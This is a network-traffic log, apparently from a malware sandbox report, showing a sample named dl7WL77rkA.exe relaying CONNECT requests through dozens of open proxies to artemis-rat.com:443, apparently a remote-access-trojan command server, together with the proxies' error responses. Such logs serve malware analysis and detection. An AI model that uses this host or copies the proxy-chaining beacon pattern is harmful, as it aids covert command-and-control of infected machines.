                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.203895092 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            573192.168.2.55167131.223.184.143803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.771337986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.115190029 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            574192.168.2.550741162.241.6.97412743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.771435022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            575192.168.2.551773162.214.197.102420193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.771532059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.295545101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            576192.168.2.55163841.111.243.18803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.771532059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.086280107 CET495INHTTP/1.1 502 Proxy Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:48 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 348
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            577192.168.2.55162193.87.49.8680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.771687031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.498600960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702049971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811767101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202137947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            578192.168.2.5516355.252.23.22010813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.774720907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            579192.168.2.55163943.133.71.20156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.969276905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            580192.168.2.551624146.190.85.7931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.969731092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.320557117 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                                            Server: squid/4.6
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3773
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2019 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            581192.168.2.551681158.255.215.5090053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.969873905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.284962893 CET339INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/4.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                                                            X-Squid-Error: TCP_RESET 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from proxy.wakoopa.com
                                                                                                                                                                                                                                                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 72 65 73 65 74
                                                                                                                                                                                                                                                            Data Ascii: reset


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            582192.168.2.55165992.205.61.38292493876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.969942093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.686068058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702460051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811677933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905174971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014776945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.217616081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            583192.168.2.551745174.64.199.7941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.970110893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            584192.168.2.55174672.195.34.4241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.971405029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            585192.168.2.55169098.64.169.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.971910954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.828469992 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            586192.168.2.551607103.140.35.1141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.971932888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            587192.168.2.550986120.194.4.15754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.972543001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.930648088 CET319INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 170
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            588192.168.2.55179112.186.205.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.972645998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
